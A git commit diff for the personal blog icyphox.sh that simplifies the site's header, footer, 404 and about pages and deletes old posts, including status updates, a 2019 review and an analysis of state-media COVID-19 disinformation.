Simplify site, a shitton
@@ -1,5 +1,10 @@
title: icyphox's blog -header: "<a href=/>← back</a>" +header: | + <section class="hero"> + <a href=/> + <img class="logo" src="/static/white.svg" alt="icyphox's avatar"/> + </a> + </section> siteurl: "https://icyphox.sh" rssprefixurl: "https://icyphox.sh/blog/" description: "Computers, security and computer security."@@ -8,8 +13,7 @@ author:
name: "Anirudh Oppiliappan" email: "x@icyphox.sh" footer: | - <img class="logo" src="/static/white.svg" alt="icyphox's avatar" style="width: 55%"/> - <p> + <!--<p> <span class="sidebar-link">email</span> <br> <a href="mailto:x@icyphox.sh">x@icyphox.sh</a>@@ -17,8 +21,8 @@ </p>
<p> <span class="sidebar-link">git</span> - <br> - <a href="https://git.icyphox.sh">git.icyphox.sh</a> + <br> + <a href="https://git.icyphox.sh">git.icyphox.sh</a> </p> <p>@@ -33,35 +37,32 @@ <br>
<a href="/static/gpg.txt">0x8A93F96F78C5D4C4</a> </p> - <h3>friends</h3> - <p> - Some of <a href="/friends">my friends</a> and internet bros. - </p> + --> - <h3>about</h3> - <p> - More <a href="/about">about me</a> and my work. - </p> + <hr> + <section> + <p> + <a href="/about">about</a> + · + <a href="/uses">uses</a> + · + <a href="/friends">friends</a> + </p> + </section> + <section class="icons"> + <a href="https://creativecommons.org/licensjes/by-nc-sa/4.0/"> + <img class="footimgs" alt="cc nc-by-sa" src="/static/cc.svg"> + </a> + <a href="https://webring.xxiivv.com/#random" target="_blank"> + <img class="footimgs" alt="xxiivv webring" src="/static/webring.svg"> + </a> + <a href="/blog/feed.xml" > + <img class="footimgs" alt="rss feed" src="/static/rss.svg"> + </a> + </section> - <h3>uses</h3> - <p> - Hardware and software <a href="/uses">that I use</a>. - </p> - - - <div class="icons"> - <a href="https://creativecommons.org/licensjes/by-nc-sa/4.0/"> - <img class="footimgs" alt="cc nc-by-sa" src="/static/cc.svg"> - </a> - <a href="https://webring.xxiivv.com/#random" target="_blank"> - <img class="footimgs" alt="xxiivv webring" src="/static/webring.svg"> - </a> - <a href="/blog/feed.xml" > - <img class="footimgs" alt="rss feed" src="/static/rss.svg"> - </a> - </div> prebuild: # - bin/update_index.py postbuild: - - bin/plaintext.sh + # - bin/plaintext.sh
@@ -0,0 +1,2 @@
+Posts that were either too shite, or lacked the research / content to be +worthy of being published.
@@ -1,26 +1,31 @@
+<!DOCTYPE html> <html lang=en> -<link rel="stylesheet" href="/static/style.css" type="text/css"> -<link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico"> -<meta content="Memeing security since forever." name=description> -<meta name="viewport" content="initial-scale=1"> -<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> -<meta content="#021012" name="theme-color"> -<meta name="HandheldFriendly" content="true"> -<meta name="twitter:card" content="summary_large_image"> -<meta name="twitter:site" content="@icyphox"> -<meta name="twitter:title" content="Anirudh"> -<meta name="twitter:description" content="Memeing security since forever."> -<meta name="twitter:image" content="/static/icyphox.png"> -<meta property="og:title" content="Anirudh"> -<meta property="og:type" content="website"> -<meta property="og:description" content="Memeing security since forever."> -<meta property="og:url" content="https://icyphox.sh"> -<meta property="og:image" content="/static/icyphox.png"> -<link rel="stylesheet" href="/static/style.css" type="text/css"> -<html> -<div class="content"> - <p align="center"> - <b>404</b> │ nothing like that here + <link rel="stylesheet" href="/static/style.css" type="text/css"> + <link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico"> + <meta name="description" content="Nothing like that here."> + <meta charset="UTF-8"> + <meta name="viewport" content="initial-scale=1"> + <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> + <meta content="#222" name="theme-color"> + <meta name="HandheldFriendly" content="true"> + <meta name="twitter:card" content="summary_large_image"> + <meta name="twitter:site" content="@icyphox"> + <meta name="twitter:title" content="404"> + <meta name="twitter:description" content="Nothing like that here."> + <meta name="twitter:image" content="/static/icyphox.png"> + <meta property="og:title" content="404"> + <meta property="og:type" content="website"> + <meta property="og:description" content="Nothing like that here."> + <meta property="og:url" content="https://icyphox.sh"> + <meta property="og:image" content="/static/icyphox.png"> + <title> + 404 + </title> + + <body> + <h1>404</h1> + <p> + Nothing like that here. </p> -</div> + </body> </html>
@@ -4,4 +4,8 @@ title: icyphox's blog
subtitle: Computers, security & computer security. --- -# icyphox's blog +<section class="hero"> +<a href=/> +<img class="logo" src="/static/white.svg" alt="icyphox's avatar"/> +</a> +</section>
@@ -7,16 +7,10 @@
# Hi. I'm Anirudh, but you'll often find me as **icyphox** (or just **icy**), -on the Internet. I'm majoring in Computer Science currently. My primary -interest is security -- with a focus on influence operations, -information warfare and state-sponsored actors. I write code on the -occasion, most of which you can find on my -[GitHub](https://github.com/icyphox). I currently work for -[CometChat](https://www.cometchat.com). - -I care about software freedom and digital privacy, and I am a staunch -advocate of the same. I try to use free alternatives to software, if -they exist. +on the Internet. I'm majoring in Computer Science. My primary interest +is security -- with a focus on influence operations, information warfare +and state-sponsored actors. I care about software freedom, privacy and +freedom of speech. My taste in music is very specific, and I hardly ever experiment. I like to stick to subgenres of metal, specifically -- metalcore and deathcore.@@ -25,15 +19,16 @@ Here are some of my links:
- [Lobsters](https://lobste.rs/u/icy) - [Hacker News](https://news.ycombinator.com/user?id=Icyphox) -- [Reddit](https://reddit.com/u/icyphox) - [Steam](https://steamcommunity.com/id/icyphox) +- [GitHub](https://github.com/icyphox) +- [git.icyphox.sh](https://git.icyphox.sh) - [Last.fm](https://last.fm/user/icyphox) The only social media I actively use is the fediverse: https://toot.icyphox.sh/@x -## Contact +## contact Send mail to [x@icyphox.sh](mailto:x@icyphox.sh). Should you need it, my PGP key: [FE1B 8FCF E6C1 6222 F157 1C8E 8A93 F96F 78C5@@ -43,13 +38,7 @@
If you're interested in **hiring me** -- here's my [résumé](https://x.icyphox.sh/resume.pdf). -## Donate - -I have [Liberapay](https://liberapay.com/icyphox) and -[Patreon](https://patreon.com/icyphox)! I don't particularly _need_ it, -but it does help with domain and server costs. :) - -## This website +## this website This site is built using a small static site generator written by me: [vite](https://github.com/icyphox/go-vite). The source for this website
@@ -1,49 +1,81 @@
--- template: text.html title: My setup -subtitle: My daily drivers---hardware, software and workflow +subtitle: My daily drivers—hardware, software and workflow date: 2019-05-13 url: my-setup --- + +**Update**: I now maintain a [uses](/uses) page. This post is out of +date. ## Hardware -The only computer I have with me is my [HP Envy 13 (2018)](https://store.hp.com/us/en/mdp/laptops/envy-13) (my model looks a little different). It’s a 13” ultrabook, with an i5 8250u, -8 gigs of RAM and a 256 GB NVMe SSD. It’s a very comfy machine that does everything I need it to. +The only computer I have with me is my [HP Envy 13 +(2018)](https://store.hp.com/us/en/mdp/laptops/envy-13) (my model looks +a little different). It’s a 13” ultrabook, with an i5 8250u, 8 gigs of +RAM and a 256 GB NVMe SSD. It’s a very comfy machine that does +everything I need it to. -For my phone, I use a [OnePlus 6T](https://www.oneplus.in/6t), running stock [OxygenOS](https://www.oneplus.in/oxygenos). As of this writing, its bootloader hasn’t been unlocked and nor has the device been rooted. -I’m also a proud owner of a [Nexus 5](https://en.wikipedia.org/wiki/Nexus_5), which I really wish Google rebooted. It’s surprisingly still usable and runs Android Pie, although the SIM slot is ruined and the battery backup is abysmal. +For my phone, I use a [OnePlus 6T](https://www.oneplus.in/6t), running +stock [OxygenOS](https://www.oneplus.in/oxygenos). As of this writing, +its bootloader hasn’t been unlocked and nor has the device been rooted. +I’m also a proud owner of a [Nexus +5](https://en.wikipedia.org/wiki/Nexus_5), which I really wish Google +rebooted. It’s surprisingly still usable and runs Android Pie, although +the SIM slot is ruined and the battery backup is abysmal. -My watch is a [Samsung Gear S3 Frontier](https://www.samsung.com/in/wearables/gear-s3-frontier-r760/). Tizen is definitely better than Android Wear. +My watch is a [Samsung Gear S3 +Frontier](https://www.samsung.com/in/wearables/gear-s3-frontier-r760/). +Tizen is definitely better than Android Wear. -My keyboard, although not with me in college, is a very old [Dell SK-8110](https://www.amazon.com/Dell-Keyboard-Model-SK-8110-Interface/dp/B00366HMMO). -For the little bit of gaming that I do, I use a [HP m150](https://www.hpshopping.in/hp-m150-gaming-mouse-3dr63pa.html) gaming mouse. It’s the perfect size (and color). +My keyboard, although not with me in college, is a very old [Dell +SK-8110](https://www.amazon.com/Dell-Keyboard-Model-SK-8110-Interface/dp/B00366HMMO). +For the little bit of gaming that I do, I use a [HP +m150](https://www.hpshopping.in/hp-m150-gaming-mouse-3dr63pa.html) +gaming mouse. It’s the perfect size (and color). -For my music, I use the [Bose SoundLink II](https://www.boseindia.com/en_in/products/headphones/over_ear_headphones/soundlink-around-ear-wireless-headphones-ii.html). +For my music, I use the [Bose SoundLink +II](https://www.boseindia.com/en_in/products/headphones/over_ear_headphones/soundlink-around-ear-wireless-headphones-ii.html). Great pair of headphones, although the ear cups need replacing. ## And the software -<del>My distro of choice for the past ~1 year has been [elementary OS](https://elementary.io). I used to be an Arch Linux elitist, complete with an esoteric -window manager, all riced. I now use whatever JustWorks™.</del> +<del>My distro of choice for the past ~1 year has been [elementary +OS](https://elementary.io). I used to be an Arch Linux elitist, complete +with an esoteric window manager, all riced. I now use whatever +JustWorks™.</del> -**Update**: As of June 2019, I've switched over to a vanilla Debian 9 Stretch install, -running [i3](https://i3wm.org) as my window manager. If you want, you can dig through my configs at my [dotfiles](https://github.com/icyphox/dotfiles) repo. +**Update**: As of June 2019, I've switched over to a vanilla Debian +9 Stretch install, running [i3](https://i3wm.org) as my window manager. +If you want, you can dig through my configs at my +[dotfiles](https://github.com/icyphox/dotfiles) repo. Here’s a (riced) screenshot of my desktop. ![scrot](https://i.redd.it/jk574gworp331.png) -Most of my work is done in either the browser, or the terminal. -My shell is pure [zsh](http://www.zsh.org), as in no plugin frameworks. It’s customized using built-in zsh functions. Yes, you don’t actually need -a framework. It’s useless bloat. The prompt itself is generated using a framework I built in [Nim](https://nim-lang.org) -- [nicy](https://github.com/icyphox/nicy). -My primary text editor is [nvim](https://neovim.org). Again, all configs in my dotfiles repo linked above. -I manage all my passwords using [pass(1)](https://passwordstore.org), and I use [rofi-pass](https://github.com/carnager/rofi-pass) to access them via `rofi`. +Most of my work is done in either the browser, or the terminal. My shell +is pure [zsh](http://www.zsh.org), as in no plugin frameworks. It’s +customized using built-in zsh functions. Yes, you don’t actually need +a framework. It’s useless bloat. The prompt itself is generated using +a framework I built in [Nim](https://nim-lang.org) -- +[nicy](https://github.com/icyphox/nicy). My primary text editor is +[nvim](https://neovim.org). Again, all configs in my dotfiles repo +linked above. I manage all my passwords using +[pass(1)](https://passwordstore.org), and I use +[rofi-pass](https://github.com/carnager/rofi-pass) to access them via +`rofi`. -Most of my security tooling is typically run via a Kali Linux docker container. This is convenient for many reasons, keeps your global namespace -clean and a single command to drop into a Kali shell. +Most of my security tooling is typically run via a Kali Linux docker +container. This is convenient for many reasons, keeps your global +namespace clean and a single command to drop into a Kali shell. -I use a DigitalOcean droplet (BLR1) as a public filehost, found at [x.icyphox.sh](https://x.icyphox.sh). The UI is the wonderful [serve](https://github.com/zeit/serve), by [ZEIT](https://zeit.co). -The same box also serves as my IRC bouncer and OpenVPN (TCP), which I tunnel via SSH running on 443. Campus firewall woes. +I use a DigitalOcean droplet (BLR1) as a public filehost, found at +[x.icyphox.sh](https://x.icyphox.sh). The UI is the wonderful +[serve](https://github.com/zeit/serve), by [ZEIT](https://zeit.co). The +same box also serves as my IRC bouncer and OpenVPN (TCP), which I tunnel +via SSH running on 443. Campus firewall woes. -I plan on converting my desktop back at home into a homeserver setup. Soon™. +I plan on converting my desktop back at home into a homeserver setup. +pSoon™.
@@ -1,69 +0,0 @@
- 17 September, 2019 - -Weekly status update, 09/08-09/17 - -A brief on what happened last week - - This is something new I'm trying out, in an effort to write more - frequently and to serve as a log of how I'm using my time. In theory, I - will write this post every week. I'll need someone to hold me - accountable if I don't. I have yet to decide on a format for this, but - it will probably include a quick summary of the work I did, things I - read, IRL stuff, etc. - - With the meta stuff out of the way, here's what went down last week! - -My discovery of the XXIIVV webring - - Did you notice the new fidget-spinner-like logo at the bottom? Click - it! It's a link to the [1]XXIIVV webring. I really like the idea of - webrings. It creates a small community of sites and enables sharing of - traffic among these sites. The XXIIVV webring consists mostly of - artists, designers and developers and gosh, some of those sites are - beautiful. Mine pales in comparison. - - The webring also has a [2]twtxt echo chamber aptly called [3]The - Hallway. twtxt is a fantastic project and its complexity-to-usefulness - ratio greatly impresses me. You can find my personal twtxt feed at - /twtxt.txt (root of this site). - - Which brings me to the next thing I did this/last week. - -twsh: a twtxt client written in Bash - - I'm not a fan of the official Python client, because you know, Python - is bloat. As an advocate of mnmlsm, I can't use it in good conscience. - Thus, began my authorship of a truly mnml client in pure Bash. You can - find it [4]here. It's not entirely useable as of yet, but it's - definitely getting there, with the help of [5]@nerdypepper. - -Other - - I have been listening to my usual podcasts: Crime Junkie, True Crime - Garage, Darknet Diaries & Off the Pill. To add to this list, I've begun - binging Vice's CYBER. It's pretty good -- each episode is only about 30 - mins and it hits the sweet spot, delvering both interesting security - content and news. - - My reading needs a ton of catching up. Hopefully I'll get around to - finishing up "The Unending Game" this week. And then go back to - "Terrorism and Counterintelligence". - - I've begun learning Russian! I'm really liking it so far, and it's been - surprisingly easy to pick up. Learning the Cyrillic script will require - some relearning, especially with letters like v, n, r, s, etc. that - look like English but sound entirely different. I think I'm pretty - serious about learning this language -- I've added the Russian keyboard - to my Google Keyboard to aid in my familiarization of the alphabet. - I've added the RU layout to my keyboard map too: -setxkbmap -option 'grp:alt_shift_toggle' -layout us,ru - - With that ends my weekly update, and I'll see you next week! - -References - - 1. https://webring.xxiivv.com/ - 2. https://github.com/buckket/twtxt - 3. https://webring.xxiivv.com/hallway.html - 4. https://github.com/icyphox/twsh - 5. https://nerdypepper.me/
@@ -1,85 +0,0 @@
- 27 September, 2019 - -Weekly status update, 09/17-09/27 - -Alpine Linux shenaningans and more - - It's a lazy Friday afternoon here; yet another off day this week thanks - to my uni's fest. My last "weekly" update was 10 days ago, and a lot - has happened since then. Let's get right into it! - -My switch to Alpine - - Previously, I ran Debian with Buster/Sid repos, and ever since this - happened -$ dpkg --list | wc -l -3817 - -# or something in that ballpark - - I've been wanting to reduce my system's package count. - - Thus, I began my search for a smaller, simpler and lighter distro with - a fairly sane package manager. I did come across Dylan Araps' [1]KISS - Linux project, but it seemed a little too hands-on for me (and still - relatively new). I finally settled on [2]Alpine Linux. According to - their website: - - Alpine Linux is a security-oriented, lightweight Linux distribution - based on musl libc and busybox. - - The installation was a breeze, and I was quite surprised to see WiFi - working OOTB. In the past week of my using this distro, the only major - hassle I faced was getting my Minecraft launcher to run. The JRE isn't - fully ported to musl yet.^[3]1 The solution to that is fairly trivial - and I plan to write about it soon. (hint: it involves chroots) - - rice - -Packaging for Alpine - - On a related note, I've been busy packaging some of the stuff I use for - Alpine -- you can see my personal [4]aports repository if you're - interested. I'm currently working on packaging Nim too, so keep an eye - out for that in the coming week. - -Talk selection at PyCon India! - - Yes! My buddy Raghav ([5]@_vologue) and I are going to be speaking at - PyCon India about our recent smart lock security research. The - conference is happening in Chennai, much to our convenience. If you're - attending too, hit me up on Twitter and we can hang! - -Other - - That essentially sums up the technical stuff that I did. My Russian is - going strong, my reading however, hasn't. I have yet to finish those - books! This week, for sure. - - Musically, I've been experimenting. I tried a bit of hip-hop and - chilltrap, and I think I like it? I still find myself coming back to - metalcore/deathcore. Here's a list of artists I discovered (and liked) - recently: - * [6]Before I Turn - * Conform (couldn't find any official YouTube video, check Spotify) - * [7]Treehouse Burning - * [8]Lee McKinney - * [9]Berried Alive (rediscovered) - - That's it for now, I'll see you next week! - __________________________________________________________________ - - 1. The [10]Portola Project - -References - - 1. https://getkiss.org/ - 2. https://alpinelinux.org/ - 3. https://icyphox.sh/home/icy/leet/site/build/blog/2019-09-27/temp.html#fn:1 - 4. https://github.com/icyphox/aports - 5. https://twitter.com/_vologue - 6. https://www.youtube.com/watch?v=r3uKGwcwGWA - 7. https://www.youtube.com/watch?v=66eFK1ttdC4 - 8. https://www.youtube.com/watch?v=m-w3XM2PwOY - 9. https://www.youtube.com/watch?v=cUibXK7F3PM - 10. https://aboullaite.me/protola-alpine-java/
@@ -1,73 +0,0 @@
- 16 October, 2019 - -Status update - -Not weekly anymore, but was it ever? - - I've decided to drop the "Weekly" part of the status update posts, - since they were never weekly and -- let's be honest---they aren't going - to be. These posts are, henceforth, just "Status updates". The date - range can be inferred from the post date. - - That said, here's what I've been up to! - -Void Linux - - Yes, I decided to ditch Alpine in favor of Void. Alpine was great, - really. The very comfy apk, ultra mnml system... but having to maintain - a chroot for my glibc needs was getting way too painful. And the - package updates are so slow! Heck, they're still on kernel 4.xx on - their supposed "bleeding" edge repo. - - So yes, Void Linux it is. Still a very clean system. I'm loving it. I - also undervolted my system using [1]undervolt (-95 mV). Can't say for - sure if there's a noticeable difference in battery life though. I'll - see if I can run some tests. - - This should be the end of my distro hopping. Hopefully. - -PyCon - - Yeah yeah, enough already. Read [2]my previous post. - -This website - - I've moved out of GitHub Pages over to Netlify. This isn't my first - time using Netlify, though. I used to host my old blog which ran Hugo, - there. I was tired of doing this terrible hack to maintain a single - repo for both my source (master) and deploy (gh-pages). In essence, - here's what I did: -#!/usr/bin/env bash - -git push origin master -# push contents of `build/` to the `gh-pages` branch -git subtree push --prefix build origin gh-pages - - I can now simply push to master, and Netlify generates a build for me - by installing [3]vite, and running vite build. Very pleasant. - -mnmlwm's status - - [4]mnmlwm, for those unaware, is my pet project which aims to be a - simple window manager written in Nim. I'd taken a break from it for a - while because Xlib is such a pain to work with (or I'm just dense). - Anyway, I'm planning on getting back to it, with some fresh inspiration - from Dylan Araps' [5]sowm. - -Other - - I've been reading a lot of manga lately. Finished Kekkon Yubiwa - Monogatari (till the latest chapter) and Another, and I've just started - Kakegurui. I'll reserve my opinions for when I update the [6]reading - log. - - That's about it, and I'll see you -- definitely not next week. - -References - - 1. https://github.com/georgewhewell/undervolt - 2. https://icyphox.sh/blog/pycon-wrap-up - 3. https://github.com/icyphox/vite - 4. https://github.com/minimalwm/minimal - 5. https://github.com/dylanaraps/sowm - 6. https://icyphox.sh/reading
@@ -1,80 +0,0 @@
- 16 November, 2019 - -Status update - -Exams, stuff, etc. - - This month is mostly just unfun stuff, lined up in a neat schedule -- - exams. I get all these cool ideas for things to do, and it's always - during exams. Anyway, here's a quick update on what I've been up to. - -Blog post queue - - I realized that I could use this site's [1]repo's issues to track blog - post ideas. I've made a few, mostly just porting them over from my - Google Keep note. - - This method of using issues is great, because readers can chime in with - ideas for things I could possibly discuss -- like in [2]this issue. - -Contemplating a vite rewrite - - [3]vite, despite what the name suggests -- is awfully slow. Also, - Python is bloat. Will rewriting it fix that? That's what I plan to find - out. I have a couple of choices of languages to use in the rewrite: - * C: Fast, compiled. Except I suck at it. (cite?) - * Nim: My favourite, but I'll have to write bindings to - [4]lowdown(1). (nite?) - * Shell: Another favourite, muh "minimalsm". No downside, really. - (shite?) - - Oh, and did I mention -- I want it to be compatible with vite. I don't - want to have to redo my site structure or its templates. At the moment, - I rely on Jinja2 for templating, so I'll need something similar. - -IRC bot - - My earlier post on [5]IRC for DMs got quite a bit of traction, which - was pretty cool. I didn't really talk much about the bot itself though; - I'm dedicating this section to [6]detotated.^[7]1 - - Fairly simple Python code, using plain sockets. So far, we've got a few - basic features in place: - * .np command: queries the user's last.fm to get the currently - playing track - * Fetches the URL title, when a URL is sent in chat - - That's it, really. I plan to add a .nps, or "now playing Spotify" - command, since we share Spotify links pretty often. - -Other - - I've been reading some more manga, I'll update the [8]reading log when - I, well... get around to it. Haven't had time to do much in the past - few weeks -- the time at the end of a semester tends to get pretty - tight. Here's what I plan to get back to during this winter break: - * Russian! - * Window manager in Nim - * vite rewrite, probably - * The other blog posts in queue - - I've also put off doing any "security work" for a while now, perhaps - that'll change this December. Or whenever. - - With that ends my status update, on all things that I haven't done. - __________________________________________________________________ - - 1. [9]https://knowyourmeme.com/memes/dedotated-wam (dead meme, yes I - know) - -References - - 1. https://github.com/icyphox/site - 2. https://github.com/icyphox/site/issues/10 - 3. https://github.com/icyphox/vite - 4. https://github.com/kristapsdz/lowdown - 5. https://icyphox.sh/blog/irc-for-dms - 6. https://github.com/icyphox/detotated - 7. https://icyphox.sh/home/icy/leet/site/build/blog/2019-11-16/temp.html#fn:1 - 8. https://icyphox.sh/reading - 9. https://knowyourmeme.com/memes/dedotated-wam
@@ -1,85 +0,0 @@
- 02 January, 2020 - -2019 in review - -A look back at last year - - Just landed in a rainy Chennai, back in campus for my 6th semester. A - little late to the "year in review blog post" party; travel took up - most of my time. Last year was pretty eventful (at least in my books), - and I think I did a bunch of cool stuff -- let's see! - -Interning at SecureLayer7 - - Last summer, I interned at [1]SecureLayer7, a security consulting firm - in Pune, India. My work was mostly in hardware and embededded security - research. I learnt a ton about ARM and MIPS reversing and exploitation, - UART and JTAG, firmware RE and enterprise IoT security. - - I also earned my first CVE! I've written about it in detail [2]here. - -Conferences - - I attended two major conferences last year -- Nullcon Goa and PyCon - India. Both super fun experiences and I met a ton of cool people! - [3]Nullcon Twitter thread and [4]PyCon blog post. - -Talks - - I gave two talks last year: - 1. Intro to Reverse Engineering at Cyware 2019 - 2. "Smart lock? Nah dude." at PyCon India - -Things I made - - Not in order, because I CBA: - * [5]repl: More of a quick bash hack, I don't really use it. - * [6]pw: A password manager. This, I actually do use. I've even - written a tiny [7]dmenu wrapper for it. - * [8]twsh: An incomplete twtxt client, in bash. I have yet to get - around to finishing it. - * [9]alpine ports: My APKBUILDs for Alpine. - * [10]detotated: An IRC bot written in Python. See [11]IRC for DMs. - * [12]icyrc: A no bullshit IRC client, because WeeChat is bloat. - - I probably missed something, but whatever. - -Blog posts - -$ ls -1 pages/blog/*.md | wc -l -20 - - So excluding today's post, and _index.md, that's 18 posts! I had - initially planned to write one post a month, but hey, this is great. My - plan for 2020 is to write one post a week -- unrealistic, I know, but I - will try nevertheless. - - I wrote about a bunch of things, ranging from programming to - return-oriented-programming (heh), sysadmin and security stuff, and a - hint of culture and philosophy. Nice! - - The [13]Python for Reverse Engineering post got a ton of attention on - the interwebz, so that was cool. - -Bye 2019 - - 2019 was super productive! (in my terms). I learnt a lot of new things - last year, and I can only hope to learn as much in 2020. :) - - I'll see you next week. - -References - - 1. https://securelayer7.net/ - 2. https://icyphox.sh/blog/fb50 - 3. https://twitter.com/icyphox/status/1101022604851212288 - 4. https://icyphox.sh/blog/pycon-wrap-up - 5. https://github.com/icyphox/repl - 6. https://github.com/icyphox/pw - 7. https://github.com/icyphox/dotfiles/blob/master/bin/pwmenu.sh - 8. https://github.com/icyphox/twsh - 9. https://github.com/icyphox/alpine - 10. https://github.com/icyphox/detotated - 11. https://icyphox.sh/blog/irc-for-dms - 12. https://github.com/icyphox/icyrc - 13. https://icyphox.sh/blog/python-for-re-1
@@ -1,81 +0,0 @@
- 18 January, 2020 - -Status update - -New year...new stuff? - - It's only been a two weeks since I got back to campus, and we've - already got our first round of cycle tests starting this Tuesday. - Granted, I returned a week late, but...that's nuts! - - We're two whole weeks into 2020; I should've been working on something - status update worthy, right? Not really, but we'll see. - -No more Cloudflare! - - Yep. If you weren't aware -- pre-2020 this site was behind Cloudflare - SSL and their DNS. I have since migrated off it to [1]he.net, thanks to - highly upvoted Lobste.rs comment. Because of this switch, I infact, - learnt a ton about DNS. - - Migrating to HE was very painless, but I did have to research a lot - about PTR records -- Cloudflare kinda dumbs it down. In my case, I had - to rename my DigitalOcean VPS instance to the FQDN, which then - automagically created a PTR record at DO's end. - -I dropped icyrc - - The IRC client I was working on during the end of last - December--early-January? Yeah, I lost interest. Apparently writing C - and ncurses isn't very fun or stimulating. - - This also means I'm back on weechat. Until I find another client that - plays well with ZNC, that is. - -KISS stuff - - I now maintain two new packages in the KISS community repository -- - 2bwm and aerc! The KISS package system is stupid simple to work with. - Creating packages has never been easier. - -[2]icyphox.sh/friends - - Did you notice that yet? I've been curating a list of people I know IRL - and online, and linking to their online presence. This is like a - webring of sorts, and promotes inter-site traffic -- making the web - more "web" again. - - If you know me, feel free to [3]hit me up and I'll link your site too! - My apologies if I've forgotten your name. - -Patreon! - - Is this big news? I dunno, but yes -- I now have a Patreon. I figured - I'd cash in on the newfound traffic my site's been getting. There won't - be any exclusive content or any tiers or whatever. Nothing will change. - Just a place for y'all to toss me some $$$ if you wish to do so. ;) - - Oh, and it's at [4]patreon.com/icyphox. - -Misc. - - The Stormlight Archive is likely the best epic I have ever read till - date. I'm still not done yet; about 500 odd pages to go as of this - writing. But wow, Brandon really does know how to build worlds and - magic systems. I cannot wait to read all about the [5]cosmere. - - I have also been working out for the past month or so. I can see them - gainzzz. I plan to keep track of my progress, I just don't know how to - quantify it. Perhaps I'll log the number of reps sets I do each time, - and with what weights. I can then look back to see if either the - weights have increased since, or the number of reps sets have. If you - know of a better way to quantify progress, let me know! I'm pretty new - to this. - -References - - 1. https://he.net/ - 2. https://icyphox.sh/friends - 3. https://icyphox.sh/about#contact - 4. https://patreon.com/icyphox - 5. https://coppermind.net/wiki/Cosmere
@@ -1,33 +0,0 @@
- 20 July, 2020 - -Status update - -Things I've been up to, for the past month-ish - - I realize I haven't updated this site in a while -- mostly due to lack - of time. The past two weeks have been pretty busy (read: I now actually - have work to do), which also means I have very little time to devote to - personal projects. Anyway, on with the update. - -I now work at CometChat - - I've begun working as an Engineering Intern at [1]CometChat. It's been - a very interesting experience so far. Most of my work revolves around - infrastructure and platform engineering -- pretty exciting stuff. - [Oops, redacted] - - I have also been extensively dabbling in XMPP and websocket internals, - as I'm writing a websocket proxy of sorts. I'll probably talk about it - in a future blog post, once I get approval org-side. :^) - -that's literally it - - I sat all day thinking of what else to add to this post -- there's got - to be something else right? Not really. I don't think I did anything - worthwhile. I did get some pretty interesting emails from people who - read this blog, so yes, please email me -- even if it's just to say hi. - I always reply. - -References - - 1. https://www.cometchat.com/
@@ -1,94 +0,0 @@
- 15 March, 2020 - -COVID-19 disinformation - -A lot of actors cashing in on the epidemic - - The virus spreads around the world, along with a bunch of - disinformation and potential malware / phishing campaigns. There are - many actors, pushing many narratives -- some similar, some different. - - Interestingly, the three big players in the information warfare space - -- Russia, Iran and China seem to be running similar stories on their - state-backed media outlets. While they all tend to lean towards the - same, fairly anti-U.S. sentiments -- that is, blaming the US for - weaponizing the crisis for political gain -- Iran and Russia's content - come off as more...conspiratorial. In essence, they claim that the - COVID-19 virus is a "bioweapon" developed by the U.S. - - Russian news agency [1]RT tweeted: - - Show of hands, who isn't going to be surprised if it ever gets - revealed that #coronavirus is a bioweapon? - - RT also published [2]an article mocking the U.S. for concerns over - Russian disinformation. Another article by RT, [3]an op-ed suggests the - virus' impact on financial markets might bring about the reinvention of - communism and the end of the global capitalist system. Russian - state-sponsored media can also be seen amplifying Iranian conspiracy - theories -- including the Islamic Revolutionary Guard Corps' (IRGC) - suggestion that COVID-19 [4]is a U.S. bioweapon. - - Iranian media outlets appear to be running stories having similar - themese, as well. Here's one [5]by PressTV, where they very boldly - claim that the virus was developed by the U.S. and/or Isreal, to use as - a bioweapon against Iran. Another [6]nonsensical piece by PressTV - suggests that "there are components of the virus that are related to - HIV that could not have occurred naturally". The same article pushes - another theory: - - There has been some speculation that as the Trump Administration has - been constantly raising the issue of growing Chinese global - competitiveness as a direct threat to American national security and - economic dominance, it might be possible that Washington has created - and unleashed the virus in a bid to bring Beijing's growing economy - and military might down a few notches. It is, to be sure, hard to - believe that even the Trump White House would do something so - reckless, but there are precedents for that type of behavior - - These "theories", as is evident, are getting wilder and wilder. - - Unsurprisingly, China produces the most amount of content related to - the coronavirus, but they're quite distinct in comparison to Russian - and Iranian media. The general theme behind Chinese narratives is - critisizing the West for...a lot of things. - - Global Times claims that [7]democracy is an insufficient system to - battle the coronavirus. They [8]blame the U.S. for unfair media - coverage against China, and other [9]anti-China narratives. There are a - ton other articles that play the racism/discrimination card -- I - wouldn't blame them though. [10]Here's one. - - In the case of India, most disinfo (actually, misinfo) is mostly just - pseudoscientific / alternative medicine / cures in the form of WhatsApp - forwards -- "Eat foo! Eat bar!".^[11]1 - - I've also been noticing a ton of COVID-19 / coronavirus related domain - registrations happening. Expect phishing and malware campaigns using - the virus as a theme. In the past 24 hrs, ~450 .com domains alone were - registered. - - corona domains - - Anywho, there are bigger problems at hand -- like the fact that my uni - still hasn't suspended classes! - __________________________________________________________________ - - 1. [12]https://www.thehindu.com/news/national/coronavirus-group-hosts- - cow-urine-party-says-covid-19-due-to-meat-eaters/article31070516.ec - e - -References - - 1. https://twitter.com/RT_com/status/1233187558793924608 - 2. https://www.rt.com/usa/481485-coronavirus-russia-state-department/ - 3. https://www.rt.com/op-ed/481831-coronavirus-kill-bill-capitalism-communism/ - 4. https://www.rt.com/news/482405-iran-coronavirus-us-biological-weapon/ - 5. https://www.presstv.com/Detail/2020/03/05/620217/US-coronavirus-James-Henry-Fetzer - 6. https://www.presstv.com/Detail/2020/03/05/620213/Coronavirus-was-produced-in-a-laboratory - 7. http://www.globaltimes.cn/content/1178494.shtml - 8. http://www.globaltimes.cn/content/1178494.shtml - 9. http://www.globaltimes.cn/content/1180630.shtml - 10. http://www.globaltimes.cn/content/1178465.shtml - 11. https://icyphox.sh/home/icy/leet/site/build/blog/covid19-disinfo/temp.html#fn:cowpiss - 12. https://www.thehindu.com/news/national/coronavirus-group-hosts-cow-urine-party-says-covid-19-due-to-meat-eaters/article31070516.ece
@@ -1,63 +0,0 @@
